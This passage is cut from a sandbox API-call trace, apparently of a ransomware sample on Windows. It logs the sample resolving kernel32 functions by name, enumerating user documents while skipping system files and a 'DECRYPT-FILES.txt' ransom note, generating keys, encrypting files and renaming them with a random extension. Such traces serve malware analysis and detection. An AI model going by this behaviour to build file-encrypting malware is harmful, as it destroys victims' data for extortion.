(in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0084.320] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0084.320] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0084.320] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0084.320] lstrlenA (lpString="CREATETHREAD") returned 12 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0084.320] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0084.320] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0084.320] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0084.320] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0084.320] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0084.320] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0084.320] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0084.321] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0084.321] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0084.321] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0084.321] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0084.321] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0084.321] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0084.321] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0084.321] lstrlenA (lpString="CTRLROUTINE") returned 11 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0084.321] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0084.321] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0084.321] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0084.321] lstrlenA (lpString="DEBUGBREAK") returned 10 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0084.321] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0084.321] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0084.321] lstrlenA (lpString="DECODEPOINTER") returned 13 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0084.321] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0084.321] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0084.321] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0084.321] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0084.322] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0084.322] lstrlenA (lpString="DELETEATOM") returned 10 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0084.322] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0084.322] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0084.322] lstrlenA (lpString="DELETEFIBER") returned 11 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0084.322] lstrlenA (lpString="DELETEFILEA") returned 11 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0084.322] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0084.322] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0084.322] lstrlenA (lpString="DELETEFILEW") returned 11 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0084.322] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0084.322] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0084.322] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0084.322] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0084.322] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0084.322] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0084.322] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0084.322] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0084.322] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0084.322] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0084.323] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0084.323] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0084.323] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0084.323] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0084.323] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0084.323] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0084.323] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0084.323] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0084.323] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0084.323] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0084.323] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0084.323] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0084.323] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0084.323] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0084.323] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0084.323] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0084.323] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0084.323] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0084.323] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0084.324] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0084.324] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0084.324] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0084.324] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0084.324] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0084.324] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0084.324] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0084.324] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0084.324] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0084.324] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0084.324] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0084.324] lstrcpyA (in: lpString1=0x3f2d468, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0084.324] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0084.324] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx") returned 58 [0084.324] wsprintfW (in: param_1=0x3f2e120, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx.pFTllnJ") returned 66 [0084.324] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvszve21xhxyv.docx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\pvsZVe21XhXYV.docx.pFTllnJ" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pvszve21xhxyv.docx.pftllnj"), dwFlags=0x0) returned 1 [0084.325] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.325] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.325] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.326] FindNextFileW (in: hFindFile=0x5f8b98, lpFindFileData=0x3f2f150 | out: lpFindFileData=0x3f2f150*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x570537c0, ftCreationTime.dwHighDateTime=0x1d53eff, ftLastAccessTime.dwLowDateTime=0x575a2da0, ftLastAccessTime.dwHighDateTime=0x1d54faa, ftLastWriteTime.dwLowDateTime=0x575a2da0, ftLastWriteTime.dwHighDateTime=0x1d54faa, nFileSizeHigh=0x0, nFileSizeLow=0xf900, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rM7ylqPkY2XjY0bBIgTA.docx", cAlternateFileName="RM7YLQ~1.DOC")) returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="DECRYPT-FILES.txt") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="autorun.inf") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="boot.ini") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="desktop.ini") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="ntuser.dat") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="iconcache.db") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="bootsect.bak") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="ntuser.dat.log") returned 1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="thumbs.db") returned -1 [0084.326] lstrcmpiW (lpString1="rM7ylqPkY2XjY0bBIgTA.docx", lpString2="Bootfont.bin") returned 1 [0084.326] lstrlenW (lpString="rM7ylqPkY2XjY0bBIgTA.docx") returned 25 [0084.326] lstrcmpiW (lpString1="docx", lpString2="lnk") returned -1 [0084.326] lstrcmpiW (lpString1="docx", lpString2="exe") returned -1 [0084.326] lstrcmpiW (lpString1="docx", lpString2="sys") returned -1 [0084.326] lstrcmpiW (lpString1="docx", lpString2="dll") returned 1 [0084.326] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned 40 [0084.326] lstrlenW (lpString="rM7ylqPkY2XjY0bBIgTA.docx") returned 25 [0084.326] lstrcpyW (in: lpString1=0x3f2e920, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\" [0084.326] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\", lpString2="rM7ylqPkY2XjY0bBIgTA.docx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx" [0084.326] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.326] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\rM7ylqPkY2XjY0bBIgTA.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\rm7ylqpky2xjy0bbigta.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x410 [0084.326] GetFileSizeEx (in: hFile=0x410, lpFileSize=0x3f2e0e8 | out: lpFileSize=0x3f2e0e8*=63744) returned 1 [0084.327] CreateFileMappingW (hFile=0x410, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x414 [0084.327] MapViewOfFile (hFileMappingObject=0x414, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0xfa0000 [0084.327] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xf90000 | out: pbBuffer=0xf90000) returned 1 [0084.327] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xf90020 | out: pbBuffer=0xf90020) returned 1 [0084.327] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.327] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x28, dwBufLen=0x100 | out: pbData=0xfb0000*, pdwDataLen=0x3f2e050*=0x100) returned 1 [0084.327] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0084.328] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.329] UnmapViewOfFile (lpBaseAddress=0xfa0000) returned 1 [0084.329] CloseHandle (hObject=0x414) returned 1 [0084.330] SetFilePointerEx (in: hFile=0x410, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0084.330] WriteFile (in: hFile=0x410, lpBuffer=0xfb0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2e070, lpOverlapped=0x0 | out: lpBuffer=0xfb0000*, lpNumberOfBytesWritten=0x3f2e070*=0x108, lpOverlapped=0x0) returned 1 [0084.331] CloseHandle (hObject=0x0) returned 0 [0084.331] CloseHandle (hObject=0x410) returned 1 [0084.331] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.331] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0084.332] GetTickCount () returned 0x114d8c3 [0084.332] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0084.332] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0084.332] VirtualAlloc (lpAddress=0x0, dwSize=0xa, flAllocationType=0x3000, flProtect=0x4) returned 0xfa0000 [0084.332] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0084.332] lstrlenA (lpString="kernel32.dll") returned 12 [0084.333] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0084.333] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0084.333] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0084.333] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0084.333] lstrlenA (lpString="ADDATOMA") returned 8 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0084.333] lstrlenA (lpString="ADDATOMW") returned 8 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0084.333] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0084.333] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0084.333] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0084.333] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0084.333] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0084.333] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0084.333] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0084.333] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0084.333] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0084.333] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0084.333] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0084.333] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0084.333] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0084.334] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0084.334] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0084.334] lstrcpyA (in: lpString1=0x3f2d468, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") 